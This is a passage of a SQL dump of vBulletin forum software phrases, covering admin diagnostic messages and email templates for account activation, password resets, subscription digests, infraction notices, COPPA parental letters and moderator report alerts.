errors occurred while opening the uploaded file for reading.', 'vbulletin', '', 0, ''), (34081, -1, 'open_basedir_in_effect', 'diagnostic', 'PHP\'s open_basedir setting has been set to {1}. The uploaded file was stored outside of this directory and is not readable. You will need to contact your host and ask them to specify upload_tmp_dir with a directory inside {1}. Note that PHP must be able to read and write to this directory.', 'vbulletin', '', 0, ''), (34082, -1, 'pass', 'diagnostic', 'Pass', 'vbulletin', '', 0, ''), (34083, -1, 'payment_api_tests', 'diagnostic', 'Payment API Tests', 'vbulletin', 'vBulletin Solutions', 1147366109, '3.6.0 Beta 1'), (34084, -1, 'pertinent_php_settings', 'diagnostic', 'Pertinent PHP Settings', 'vbulletin', '', 0, ''), (34085, -1, 'pertinent_smtp_settings', 'diagnostic', 'Pertinent SMTP Settings', 'vbulletin', '', 0, ''), (34086, -1, 'problematic_server_modules', 'diagnostic', 'Problematic Webserver Modules', 'vbulletin', 'vBulletin Solutions', 1203957445, '3.7.0 Beta 6'), (34087, -1, 'problematic_server_modules_explained', 'diagnostic', 'Some server modules can cause asymptomatic problems with vBulletin, these diagnostics will help identify if the modules are installed.', 'vbulletin', 'vBulletin Solutions', 1203957591, '3.7.0 Beta 6'), (34088, -1, 'safe_mode_dir_not_dir', 'diagnostic', 'The \"Safe Mode Temp Directory\" you have specified ({1}) does not appear to be a directory. Please specify the correct directory and attempt this test again.', 'vbulletin', '', 0, ''), (34089, -1, 'safe_mode_enabled_no_tmp_dir', 'diagnostic', 'You have safe mode uploading enabled but have not specified \"Safe Mode Temp Directory\". Please specify one on the options page and attempt this test again.', 'vbulletin', '', 0, ''), (34090, -1, 'safe_mode_not_writeable', 'diagnostic', 'The \"Safe Mode Temp Directory\" you have specified ({1}) is not writeable by PHP. You will most likely need to make this directory world writeable. Correct this and attempt this test again.', 'vbulletin', '', 0, ''), (34091, -1, 'scanned_x_files', 'diagnostic', 'Scanned {1} files', 'vbulletin', '', 0, ''), (34092, -1, 'server_information_desc', 'diagnostic', 'While not exactly a test, this function is helpful for tracking down server issues. Simply select the appropriate type of information and submit the form.', 'vbulletin', '', 0, ''), (34093, -1, 'smtp_username', 'diagnostic', 'SMTP Username:', 'vbulletin', '', 0, ''), (34094, -1, 'suhosin_problem_desc', 'diagnostic', 'Suhosin can limit the amount of data submitted and encrypt cookies causing problems with several aspects of vBulletin.', 'vbulletin', 'vBulletin Solutions', 1203957297, '3.7.0 Beta 6'), (34095, -1, 'suspect_file_versions', 'diagnostic', 'Suspect File Versions', 'vbulletin', '', 0, ''), (34096, -1, 'system_information', 'diagnostic', 'System Information', 'vbulletin', '', 0, ''), (34097, -1, 'table_status', 'diagnostic', 'Table Status', 'vbulletin', '', 0, ''), (34098, -1, 'test_cannot_continue', 'diagnostic', 'The test cannot continue.', 'vbulletin', '', 0, ''), (34099, -1, 'test_indeterminate_contact_host', 'diagnostic', 'The test was indeterminate. There were problems reading the uploaded file, but none of PHP\'s settings were identified as causing a problem. At this point, you should attempt to attach a file to a post. If that fails, contact your host as no one will know their own server setup better than them.', 'vbulletin', '', 0, ''), (34100, -1, 'turn_safe_mode_option_off', 'diagnostic', 'You should be able to turn off the \"Upload In Safe Mode?\" option without any adverse effects.', 'vbulletin', '', 0, ''), (34101, -1, 'unable_to_copy_attached_file', 'diagnostic', 'The attached file could not be copied to {1}. PHP\'s safe_mode setting must be disabled for uploads to function. You will need to contact your host for this to be changed.', 'vbulletin', '', 0, ''), (34102, -1, 'unable_to_find_attached_file', 'diagnostic', 'The attached file\'s temporary location ({1}) could not be found. {2}', 'vbulletin', '', 0, ''), (34103, -1, 'unable_to_open_directory', 'diagnostic', 'Unable to open directory', 'vbulletin', '', 0, ''), (34104, -1, 'unable_to_open_x', 'diagnostic', 'Unable to open file: {1}', 'vbulletin', '', 0, ''), (34105, -1, 'upload_test_desc', 'diagnostic', 'This test\'s purpose is to determine if there are any vBulletin/PHP options you need to change for uploads to function correctly. To begin, simply attach a small file using the box below and submit the form. vBulletin will not save the attached file in anyway.', 'vbulletin', '', 0, ''), (34106, -1, 'vbulletin_email_test', 'diagnostic', 'vBulletin Email Test', 'vbulletin', '', 0, ''), (34107, -1, 'vbulletin_email_test_msg', 'diagnostic', 'You are receiving this email because your email address was entered as an email test at {1}.\r\n\r\nThe first step of this email test script has been completed. However, a formatting test is still necessary:\r\n\r\nA paragraph break.\r\nA single line break.\r\n\r\nAnother paragraph break.\r\nAnother single line break.\r\nAnother single line break.\r\n\r\nIf the above lines look correct, you are finished. The email features on your server are setup correctly.\r\nIf this email is run together on one line, there is possibly a configuration error with your mail server. Please ensure it is configured correctly.', 'vbulletin', '', 0, ''), (34108, -1, 'vbulletin_email_test_withf', 'diagnostic', 'vBulletin Email Test (With -f Parameter)', 'vbulletin', '', 0, ''), (34109, -1, 'version', 'diagnostic', 'Version', 'vbulletin', '', 0, ''), (34110, -1, 'accountlocked', 'emailbody', 'Dear $user[username],\r\n\r\nSomeone has tried to log into your account on $vboptions[bbtitle] with an incorrect password at least 5 times. This person has been prevented from attempting to login to your account for the next 15 minutes.\r\n\r\nThe person trying to log into your account had the following IP address: $ip\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1208441696, '3.7.0 Release Candidate 4'), (34111, -1, 'activateaccount', 'emailbody', 'Dear $username,\r\n\r\nThank you for registering at the $vboptions[bbtitle]. Before we can activate your account one last step must be taken to complete your registration.\r\n\r\nPlease note - you must complete this last step to become a registered member. You will only need to visit this URL once to activate your account.\r\n\r\nTo complete your registration, please visit this URL:\r\n$vboptions[bburl]/register.php?a=act&u=$userid&i=$activateid\r\n\r\nAmerica Online Users Please Visit Here to be Activated\r\n\r\n**** Does The Above URL Not Work? ****\r\nIf the above URL does not work, please use your Web browser to go to:\r\n$vboptions[bburl]/register.php?a=ver\r\n\r\nPlease be sure not to add extra spaces. You will need to type in your username and activation number on the page that appears when you visit the URL.\r\n\r\nYour Username is: $username\r\nYour Activation ID is: $activateid\r\n\r\nIf you are still having problems signing up please contact a member of our support staff at $vboptions[webmasteremail]\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n\r\n--------------------\r\nTo stop receiving this email, please visit this URL:\r\n$vboptions[bburl]/register.php?do=deleteactivation&u=$userid&i=$activateid ', 'vbulletin', 'vBulletin Solutions', 1205943168, '3.7.0 Release Candidate 1'), (34112, -1, 'activateaccount_change', 'emailbody', 'Dear $username,\r\n\r\nSince you have recently changed your email, we require that you verify your new email address. You will only need to visit the URL once to have your account updated.\r\n\r\nTo complete reverification, please visit this URL:\r\n$vboptions[bburl]/register.php?a=act&u=$userid&i=$activateid\r\n\r\nAmerica Online Users Please Visit Here to be Activated\r\n\r\n**** Does The Above URL Not Work? ****\r\nIf the above URL does not work, please use your Web browser to go to:\r\n$vboptions[bburl]/register.php?a=ver\r\n\r\nPlease to be sure not to add extra spaces. You will need to type in your username and activation number on the page that appears when you visit the url.\r\n\r\nYour Username is: $username\r\nYour Activation ID is: $activateid\r\n\r\nIf you are still having problems verifying please contact a member of our support staff at $vboptions[webmasteremail]\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n\r\n--------------------\r\nTo stop receiving this email, please visit this URL:\r\n$vboptions[bburl]/register.php?do=deleteactivation&u=$userid&i=$activateid', 'vbulletin', 'vBulletin Solutions', 1205943249, '3.7.0 Release Candidate 1'), (34113, -1, 'attachfull', 'emailbody', '$bbuserinfo[username] has just tried to attach a file that would exceed the $vboptions[attachtotalspace] byte quota you setup by $overage.\r\n\r\nIn order to allow users to continue attaching files, we recommend you delete some attachments. You can perform attachment management on the following pages:\r\n\r\n$vboptions[bburl]/$admincpdir/attachment.php?do=intro\r\n$vboptions[bburl]/$admincpdir/attachment.php?do=stats', 'vbulletin', '', 0, ''), (34114, -1, 'birthday', 'emailbody', 'Hello $username,\r\n\r\nWe at $vboptions[bbtitle] would like to wish you a happy birthday today!', 'vbulletin', '', 0, ''), (34115, -1, 'contactus', 'emailbody', 'The following message was sent to you via the $vboptions[bbtitle] Contact Us form by $name ( mailto:$email ).\r\n\r\n--------------------------------\r\n\r\n$message\r\n\r\n--------------------------------\r\n\r\nReferring Page: $url\r\nIP Address: $ip\r\nUser Name: $bbuserinfo[username]\r\nUser ID: $bbuserinfo[userid]\r\nEmail: $email', 'vbulletin', 'vBulletin Solutions', 1197640651, '3.7.0 Beta 2'), (34116, -1, 'digestforum', 'emailbody', 'Dear $forum[username],\r\n\r\nYou are subscribed to the forum $forum[title_clean], there have been $newthreads new thread(s) and $updatedthreads updated thread(s).\r\n$vboptions[bburl]/forumdisplay.php?f=$forum[forumid]\r\n\r\nThe following threads are new:\r\n$newthreadbits\r\n\r\nThe following threads have been updated:\r\n$updatedthreadbits\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nUnsubscription information:\r\n\r\nTo unsubscribe from this forum, please visit this page:\r\n$vboptions[bburl]/subscription.php?do=removesubscription&type=forum&subscriptionid=$forum[subscribeforumid]&auth=$forum[auth]\r\n', 'vbulletin', 'vBulletin Solutions', 1150508988, '3.6.0 Beta 3'), (34117, -1, 'digestgroup', 'emailbody', 'Dear $group[username],\r\n\r\nYou are subscribed to the group $group[name], there have been $new_discussions new discussion(s) and $updated_discussions updated discussions(s).\r\n$vboptions[bburl]/group.php?groupid=$group[groupid]\r\n\r\nThe following discussions are new:\r\n$new_discussion_bits\r\n\r\nThe following discussions have been updated:\r\n$updated_discussion_bits\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1234791622, '3.8.2'), (34118, -1, 'digestgroupbit', 'emailbody', '************\r\n$discussion[title]\r\n$vboptions[bburl]/group.php?do=discuss&discussionid=$discussion[discussionid]\r\nIn group: $group[name]\r\nStarted by: $discussion[postusername]\r\nLast post: $discussion[lastreplydate] $discussion[lastreplytime]', 'vbulletin', 'vBulletin Solutions', 1234791633, '3.8.2'), (34119, -1, 'digestpostbit', 'emailbody', '************\r\n$post[title]\r\n$vboptions[bburl]/showthread.php?p=$post[postid]#post$post[postid]\r\nPosted by: $post[postusername]\r\nOn: $post[postdate] $post[posttime]\r\n\r\n$post[pagetext]\r\n', 'vbulletin', '', 0, ''), (34120, -1, 'digestthread', 'emailbody', 'Dear $thread[username],\r\n\r\nYou are subscribed to the thread \"$thread[prefix_plain]$thread[title]\" by $thread[postusername], there have been $thread[newposts] post(s) to this thread, the last poster was $thread[lastposter].\r\n$vboptions[bburl]/showthread.php?t=$thread[threadid]\r\n\r\nThese following posts were made to the thread:\r\n$postbits\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nUnsubscription information:\r\n\r\nTo unsubscribe from this thread, please visit this page:\r\n$vboptions[bburl]/subscription.php?do=removesubscription&type=thread&subscriptionid=$thread[subscribethreadid]&auth=$thread[auth]\r\n', 'vbulletin', 'vBulletin Solutions', 1189591905, '3.6.8'), (34121, -1, 'digestthreadbit', 'emailbody', '************\r\n$thread[prefix_plain]$thread[title]\r\n$vboptions[bburl]/showthread.php?t=$thread[threadid]\r\nIn forum: $thread[forumtitle]\r\nStarted by: $thread[postusername]\r\nLast post: $thread[lastreplydate] $thread[lastreplytime]\r\n', 'vbulletin', 'vBulletin Solutions', 1189592036, '3.6.8'), (34122, -1, 'friendship_request_email', 'emailbody', 'Dear $userinfo[username],\r\n\r\n$fromuserinfo[username] has requested that you become friends. You can approve or deny this request by visiting:\r\n\r\n$vboptions[bburl]/profile.php?do=buddylist\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1209745496, '3.7.1'), (34123, -1, 'infraction_post', 'emailbody', 'This infraction has been reversed.\r\n\r\nReason: [quote]$infractioninfo[reason][/quote]', 'vbulletin', 'vBulletin Solutions', 1149280670, '3.6.0 Beta 1'), (34124, -1, 'infraction_received_post', 'emailbody', 'Dear $infraction[username],\r\n\r\nYou have received an infraction at $vboptions[bbtitle].\r\n\r\nReason: $infraction[reason]\r\n-------\r\n$infraction[message]\r\n-------\r\n\r\nThis infraction is worth $infraction[points] point(s) and may result in restricted access until it expires. Serious infractions will never expire.\r\n\r\nOriginal Post:\r\n$infraction[post]\r\n[quote]$infraction[pagetext][/quote]\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1166747689, '3.6.5'), (34125, -1, 'infraction_received_profile', 'emailbody', 'Dear $infraction[username],\r\n\r\nYou have received an infraction at $vboptions[bbtitle].\r\n\r\nReason: $infraction[reason]\r\n-------\r\n$infraction[message]\r\n-------\r\n\r\nThis infraction is worth $infraction[points] point(s) and may result in restricted access until it expires. Serious infractions will never expire.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1166744440, '3.6.5'), (34126, -1, 'infraction_thread_post', 'emailbody', 'Post: [url=$vboptions[bburl]/showthread.php?p=$postinfo[postid]]$infractioninfo[prefix_plain]$infractioninfo[threadtitle][/url]\r\nUser: [url=$vboptions[bburl]/member.php?u=$userinfo[userid]]$infractioninfo[username][/url]\r\nInfraction: $infractioninfo[title]\r\nPoints: $infractioninfo[points]\r\n\r\nAdministrative Note:[quote]$infractioninfo[note][/quote]\r\n\r\n\r\nMessage to User:[quote]$infractioninfo[message][/quote]\r\n\r\n\r\nOriginal Post: [quote]$postinfo[pagetext][/quote]', 'vbulletin', 'vBulletin Solutions', 1210933574, '3.7.1'), (34127, -1, 'infraction_thread_profile', 'emailbody', 'User: [url=$vboptions[bburl]/member.php?u=$userinfo[userid]]$infractioninfo[username][/url]\r\nInfraction: $infractioninfo[title]\r\nPoints: $infractioninfo[points]\r\n\r\nAdministrative Note:[quote]$infractioninfo[note][/quote]\r\n\r\n\r\nMessage to User:[quote]$infractioninfo[message][/quote]', 'vbulletin', 'vBulletin Solutions', 1210933583, '3.7.1'), (34128, -1, 'lostpw', 'emailbody', 'Dear $user[username],\r\n\r\nYou have requested to reset your password on $vboptions[bbtitle] because you have forgotten your password. If you did not request this, please ignore it. It will expire and become useless in 24 hours time.\r\n\r\nTo reset your password, please visit the following page:\r\n$vboptions[bburl]/login.php?a=pwd&u=$user[userid]&i=$user[activationid]\r\n\r\nWhen you visit that page, your password will be reset, and the new password will be emailed to you.\r\n\r\nYour username is: $user[username]\r\n\r\nTo edit your profile, go to this page:\r\n$vboptions[bburl]/profile.php?do=editprofile\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34129, -1, 'moderation_deleted', 'emailbody', 'Dear $username,\r\n\r\nUnfortunately your registration at $vboptions[bbtitle] did not meet our membership requirements. Therefore your registration was deleted.\r\n\r\nSorry,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34130, -1, 'moderation_validated', 'emailbody', 'Dear $username,\r\n\r\nWe have now activated your account at the $vboptions[bbtitle]. The forums can be found here:\r\n\r\n$vboptions[bburl]/$vboptions[forumhome].php\r\n\r\nYour login details are as follows:\r\nUsername: $username\r\nPassword: as you entered it when you registered\r\n\r\nDon\'t forget that your password is case sensitive.\r\n\r\nTo edit your profile, please visit this page:\r\n$vboptions[bburl]/profile.php?do=editprofile\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34131, -1, 'moderator', 'emailbody', 'Hello,\r\n\r\n$bbuserinfo[username] has just posted in the $foruminfo[title_clean] forum of $vboptions[bbtitle] under the title of $threadinfo[prefix_plain]$threadinfo[title].\r\n\r\nThis thread is located at $vboptions[bburl]/showthread.php?t=$threadinfo[threadid]\r\n\r\nHere is the message that has just been posted:\r\n***************\r\n$post[message]\r\n***************', 'vbulletin', 'vBulletin Solutions', 1189605367, '3.6.8'), (34132, -1, 'newevent', 'emailbody', 'Hello,\r\n\r\n$bbuserinfo[username] has just posted in the $calendarinfo[title] calendar of $vboptions[bbtitle] under the title of $title.\r\n\r\nThis event is located at $vboptions[bburl]/calendar.php?do=getinfo&e=$eventid\r\n\r\nHere is the event that has just been posted:\r\n***************\r\n$eventmessage\r\n***************', 'vbulletin', '', 0, ''), (34133, -1, 'newuser', 'emailbody', 'There is a new user, $username at $vboptions[bbtitle]\r\n\r\nTo view their profile, go here:\r\n\r\n$vboptions[bburl]/member.php?u=$userid\r\n\r\nEmail Address : $email\r\nBirthday : $birthday\r\nReferrer: $referrer\r\nIP Address: $ipaddress\r\n\r\n$customfields', 'vbulletin', 'vBulletin Solutions', 1147896422, '3.6.0 Beta 1'), (34134, -1, 'notify', 'emailbody', 'Dear $touser[username],\r\n\r\n$bbuserinfo[username] has just replied to a thread you have subscribed to entitled - $threadinfo[prefix_plain]$threadinfo[title] - in the $foruminfo[title_clean] forum of $vboptions[bbtitle].\r\n\r\nThis thread is located at:\r\n$vboptions[bburl]/showthread.php?t=$threadinfo[threadid]&goto=newpost\r\n\r\nHere is the message that has just been posted:\r\n***************\r\n$pagetext\r\n***************\r\n\r\n\r\nThere may also be other replies, but you will not receive any more notifications until you visit the forum again.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nUnsubscription information:\r\n\r\nTo unsubscribe from this thread, please visit this page:\r\n$vboptions[bburl]/subscription.php?do=removesubscription&type=thread&subscriptionid=$touser[subscribethreadid]&auth=$touser[auth]\r\n\r\nTo unsubscribe from ALL threads, please visit this page:\r\n$vboptions[bburl]/subscription.php?do=viewsubscription&folderid=all\r\n', 'vbulletin', 'vBulletin Solutions', 1189592553, '3.6.8'), (34135, -1, 'notify_discussion', 'emailbody', 'Dear $touser[username],\r\n\r\n$bbuserinfo[username] has replied to a social group discussion you have subscribed to entitled - $discussion[title] - in the $group[name] group of $vboptions[bbtitle].\r\n\r\nThis discussion is located at:\r\n$vboptions[bburl]/group.php?do=discuss&discussionid=$discussion[discussionid]&goto=newpost\r\n\r\nHere is the message that has just been posted:\r\n***************\r\n$pagetext\r\n***************\r\n\r\n\r\nThere may also be other replies, but you will not receive any more notifications until you visit the forum again.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nUnsubscription information:\r\n\r\nTo unsubscribe from this discussion, please visit this page:\r\n$vboptions[bburl]/group.php?do=unsubscribe&subscriptionid=$touser[subscribediscussionid]&auth=$touser[auth]\r\n\r\nTo unsubscribe from ALL discussions, please visit this page:\r\n$vboptions[bburl]/groupsubscription.php\r\n\r\nTo unsubscribe from ALL forum threads, please visit this page:\r\n$vboptions[bburl]/subscription.php?do=viewsubscription&folderid=all', 'vbulletin', 'vBulletin Solutions', 1225800231, '3.8.0 Beta 2'), (34136, -1, 'paidsubscription_reminder', 'emailbody', 'Dear $username,\r\n\r\nYour access to the paid subscription \"$subscription_title\" is about to expire.\r\n\r\nIf you have selected a recurring subscription you will be automatically billed for the renewal, else to renew this subscription you must visit $vboptions[bburl]/payments.php\r\n\r\nIf you do not extend your subscription, access will be removed.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34137, -1, 'parentcoppa_profile', 'emailbody', 'Dear Parent/Guardian of $username,\r\n\r\n$username has just modified their account at $vboptions[bbtitle]. This can be found at:\r\n\r\n$vboptions[bburl]/$vboptions[forumhome].php\r\n\r\nThis email has been sent to you because $username has stated that they are younger than 13 years of age and $vboptions[bbtitle] is in compliance with the Children\'s Online Privacy Protection Act of 1998 (COPPA).\r\n\r\nTo find out more about COPPA, please visit this page:\r\nhttp://www.ftc.gov/opa/1999/10/childfinal.htm\r\n\r\nPlease read the $vboptions[bbtitle] Privacy Statement also:\r\n$vboptions[privacyurl]\r\n\r\n$username\'s profile can be viewed at:\r\n\r\n$vboptions[bburl]/member.php?u=$userid\r\n\r\nWe thank you for helping us in keeping the privacy of children on the internet.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1202918875, '3.7.0 Beta 5'), (34138, -1, 'parentcoppa_register', 'emailbody', 'Dear Parent/Guardian of $username,\r\n\r\n$username has just signed up for an account at $vboptions[bbtitle]. This can be found at:\r\n\r\n$vboptions[bburl]/$vboptions[forumhome].php\r\n\r\nThis email has been sent to you because $username has stated that they are younger than 13 years of age and $vboptions[bburl] is in compliance with the Children\'s Online Privacy Protection Act of 1998 (COPPA).\r\n\r\nTo find out more about COPPA, please visit this page:\r\nhttp://www.ftc.gov/opa/1999/10/childfinal.htm\r\n\r\nPlease read the $vboptions[bbtitle] Privacy Statement also:\r\n$vboptions[privacyurl]\r\n\r\nYou must print out the permission form, fill it in and mail or fax it back to the webmaster. Details about how to return the form are on the form itself.\r\n\r\nThe form can be accessed through this page:\r\n\r\n$vboptions[bburl]/profile.php?do=editprofile\r\n\r\nFrom that page, you can also view the profile and make any modification you wish. You will need these login details:\r\n\r\nUsername: $username\r\nPassword: $password\r\n(Note that the password is case sensitive)\r\n\r\nWe thank you for helping us in keeping the privacy of children on the internet.\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1202918887, '3.7.0 Beta 5'), (34139, -1, 'payment_received', 'emailbody', 'A paid subscription has just been purchased by $username at $vboptions[bbtitle]\r\n\r\nTo view their profile, go here:\r\n\r\n$vboptions[bburl]/member.php?u=$userid\r\n\r\nUsername : $username\r\nSubscription : $subscription\r\nAmount: $amount\r\nProcessor: $processor\r\nTransaction ID: $transactionid\r\n', 'vbulletin', 'vBulletin Solutions', 1147381143, '3.6.0 Beta 1'), (34140, -1, 'payment_reversed', 'emailbody', 'A paid subscription has just been reversed by $username at $vboptions[bbtitle]\r\n\r\nTo view their profile, go here:\r\n\r\n$vboptions[bburl]/member.php?u=$userid\r\n\r\nUsername : $username\r\nSubscription : $subscription\r\nAmount: -$amount\r\nProcessor: $processor\r\nTransaction ID: $transactionid\r\n', 'vbulletin', 'vBulletin Solutions', 1147381159, '3.6.0 Beta 1'), (34141, -1, 'pmboxalmostfull', 'emailbody', 'Dear $touserinfo[username],\r\n\r\nYour private messages box on $vboptions[bbtitle] has reached 90% of your allowed quota. To ensure that you do not reach 100% of your allowed messages, you should consider archiving or deleting some of your messages. Please visit this page to do so:\r\n$vboptions[bburl]/private.php\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1146508707, '3.6.0 Beta 1'), (34142, -1, 'pmboxfull', 'emailbody', 'Dear $touserinfo[username],\r\n\r\n$fromusername has just tried to send you a private message. However, your private messages box on $vboptions[bbtitle] has reached the specified quota. In order to receive further private messages, you must delete some messages. Please visit this page to do so:\r\n$vboptions[bburl]/private.php\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', '', 0, ''), (34143, -1, 'pmreceived', 'emailbody', 'DO NOT REPLY TO THIS EMAIL!\r\n***************************\r\n\r\nDear $touserinfo[username],\r\n\r\nYou have received a new private message at $vboptions[bbtitle] from $fromusername, entitled \"$plaintext_title\".\r\n\r\nTo read the original version, respond to, or delete this message, you must log in here:\r\n$vboptions[bburl]/private.php\r\n\r\nThis is the message that was sent:\r\n***************\r\n$plaintext_message\r\n***************\r\n\r\nAgain, please do not reply to this email. You must go to the following page to reply to this private message:\r\n$vboptions[bburl]/private.php\r\n\r\nAll the best,\r\n$vboptions[bbtitle]', 'vbulletin', 'vBulletin Solutions', 1155814425, '3.6.1'), (34144, -1, 'reminder', 'emailbody', 'Dear $username,\r\n\r\nThe following events are scheduled to begin soon at $vboptions[bbtitle].\r\n\r\nUpcoming events:\r\n$reminderbits\r\n\r\nAll the best,\r\n$vboptions[bbtitle]\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nUnsubscription information:\r\n\r\nTo unsubscribe from this email, please visit this page and delete any future reminders:\r\n$vboptions[bburl]/calendar.php?do=viewreminder', 'vbulletin', '', 0, ''), (34145, -1, 'reminderbit', 'emailbody', '************\r\n$eventinfo[title] (In less than $hour hour(s))\r\n$vboptions[bburl]/calendar.php?do=getinfo&e=$eventinfo[eventid]\r\nIn Calendar: $eventinfo[calendar]\r\n', 'vbulletin', '', 0, ''), (34146, -1, 'reportalbumpicture', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this picture:\r\n\r\n$vboptions[bburl]/album.php?albumid=$reportinfo[albumid]&pictureid=$reportinfo[pictureid]\r\n\r\nThis is part of the album:\r\n\'$reportinfo[albumtitle]\' by $reportinfo[username]\r\n$vboptions[bburl]/album.php?albumid=$reportinfo[albumid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.', 'vbulletin', 'vBulletin Solutions', 1208774772, '3.7.0 Release Candidate 4'), (34147, -1, 'reportalbumpicture_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported an album picture.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nPicture: [url]$vboptions[bburl]/album.php?albumid=$reportinfo[albumid]&pictureid=$reportinfo[pictureid][/url]\r\nAlbum: [url=$vboptions[bburl]/album.php?albumid=$reportinfo[albumid]]$reportinfo[albumtitle][/url]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]', 'vbulletin', 'vBulletin Solutions', 1196379287, '3.7.0 Beta 1'), (34148, -1, 'reportgroupmessage', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this post:\r\n\r\n$reportinfo[messagetitle]\r\n$vboptions[bburl]/group.php?gmid=$reportinfo[gmid]#gmessage$reportinfo[gmid]\r\n\r\nThis is part of the social group:\r\n$reportinfo[groupname]\r\n$vboptions[bburl]/group.php?groupid=$reportinfo[groupid]\r\n\r\nIn the discussion:\r\n$reportinfo[discussiontitle]\r\n$vboptions[bburl]/group.php?discussionid=$reportinfo[discussionid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.\r\n\r\nPlease respond to this post as applicable.', 'vbulletin', 'vBulletin Solutions', 1222176930, '3.8.0 Alpha 2'), (34149, -1, 'reportgroupmessage_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a social group message.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nMessage: [url]$vboptions[bburl]/group.php?gmid=$reportinfo[gmid]#gmessage$reportinfo[gmid][/url]\r\nSocial Group: [url=$vboptions[bburl]/group.php?groupid=$reportinfo[groupid]]$reportinfo[groupname][/url]\r\nDiscussion: [url=$vboptions[bburl]/group.php?discussionid=$reportinfo[discussionid]]$reportinfo[discussiontitle][/url]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]\r\nOriginal Content: [quote]$reportinfo[pagetext][/quote]', 'vbulletin', 'vBulletin Solutions', 1222176951, '3.8.0 Alpha 2'), (34150, -1, 'reportgrouppicture', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this picture:\r\n\r\n$vboptions[bburl]/group.php?do=picture&groupid=$reportinfo[groupid]&pictureid=$reportinfo[pictureid]\r\n\r\nThis is part of the group:\r\n$reportinfo[groupname]\r\n$vboptions[bburl]/group.php?groupid=$reportinfo[groupid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.', 'vbulletin', 'vBulletin Solutions', 1208774817, '3.7.0 Release Candidate 4'), (34151, -1, 'reportgrouppicture_newthread', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has reported a group picture.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]\r\nPicture: [url]$vboptions[bburl]/group.php?do=picture&groupid=$reportinfo[groupid]&pictureid=$reportinfo[pictureid][/url]\r\nGroup: [url=$vboptions[bburl]/group.php?groupid=$reportinfo[groupid]]$reportinfo[groupname][/url]\r\nAssigned Moderators: $reportinfo[modlist]\r\n\r\nPosted by: [url=$vboptions[bburl]/member.php?u=$reportinfo[puserid]]$reportinfo[pusername][/url]', 'vbulletin', 'vBulletin Solutions', 1196378170, '3.7.0 Beta 1'), (34152, -1, 'reportitem_newpost', 'emailbody', '[url=$vboptions[bburl]/member.php?u=$reportinfo[ruserid]]$reportinfo[rusername][/url] has also reported this item.\r\n\r\nReason:[quote]$reportinfo[reason][/quote]', 'vbulletin', 'vBulletin Solutions', 1196371238, '3.7.0 Beta 1'), (34153, -1, 'reportpicturecomment', 'emailbody', '$reportinfo[rusername] ( mailto:$reportinfo[remail] ) has reported this picture comment:\r\n\r\n$vboptions[bburl]/$reportinfo[commenturl]\r\n\r\nThis comment was posted by:\r\n$reportinfo[pusername]\r\n$vboptions[bburl]/member.php?u=$reportinfo[puserid]\r\n\r\nThis is the reason that the user gave:\r\n$reportinfo[reason]\r\n\r\n$reportinfo[discuss]\r\n\r\nThis message has been sent to all moderators of this area, or all administrators if there are no moderators.\r\n\r\nPlease respond to this post as applicable.', 'vbulletin', 'vBulletin Solutions', 1208774837, '3.7.0 Release Candidate 